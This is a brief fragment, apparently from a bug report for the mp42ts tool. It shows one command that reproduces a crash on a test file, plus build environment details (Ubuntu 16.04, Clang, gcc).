./mp42ts mp42ts-hbo-01 /dev/null

**Environment**

Ubuntu 16.04  
Clang 10.0.1  
gcc 5.5

Tag

#linux